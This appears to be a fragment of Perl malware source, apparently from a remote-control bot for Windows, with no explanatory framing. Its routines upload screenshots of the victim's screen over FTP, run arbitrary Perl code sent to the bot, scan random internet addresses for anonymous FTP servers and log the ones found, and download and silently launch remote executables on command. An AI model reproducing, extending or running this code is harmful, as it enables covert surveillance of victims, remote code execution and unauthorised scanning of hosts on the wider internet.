############################# sub ftpscreenthread { $uploadfile = "$pfad\\$nick\_Screen.png"; $makescreen = CaptureScreen(); $makescreen->SaveToFile("$uploadfile"); ftpuploadthread(); unlink ("$uploadfile"); threads->exit; } sub perlthread { eval "$perlline"; threads->exit; } sub pubscanthread { open (PUBFILE,">","$pubfile"); while ($pubscan eq true) { $A = int(rand(256)); $B = int(rand(256)); $C = int(rand(256)); $D = int(rand(256)); $ftpsock = new IO::Socket::INET(PeerAddr => "$A.$B.$C.$D", PeerPort => "21", Proto => "tcp", Timeout => "5"); while ($ftpinput = <$ftpsock>) { if ($ftpinput =~ m/^(220) /) { print $ftpsock "USER anonymous\r\n"; } if ($ftpinput =~ m/^(331) /) { print $ftpsock "PASS anonymous\@$A.$B.$C.$D.com\r\n"; } if ($ftpinput =~ m/^(230) /) { print PUBFILE "$A.$B.$C.$D\r\n"; print $ftpsock "QUIT\r\n"; } if ($ftpinput !~ m/^(220|331|230|221)/) { print $ftpsock "QUIT\r\n"; } } close ($ftpsock); select(undef, undef, undef, 0.001); } close (PUBFILE); threads->exit; } sub webdownloadthread { getstore($dlurl,$dlfile); if (($befehl) eq (-webupdate)) { Win32::Process::Create($pdownload, "$dlfile", "\"$pfad\\$dlfile\" $dlpara", "0", "DETACHED_PROCESS", ".") && exit; } if (($befehl) eq (-webdownexec)) { Win32::Process::Create($pdownload, "$dlfile", "\"$pfad\\$dlfile\" $dlpara", "0", "DETACHED_PROCESS", "."); } threads->exit; }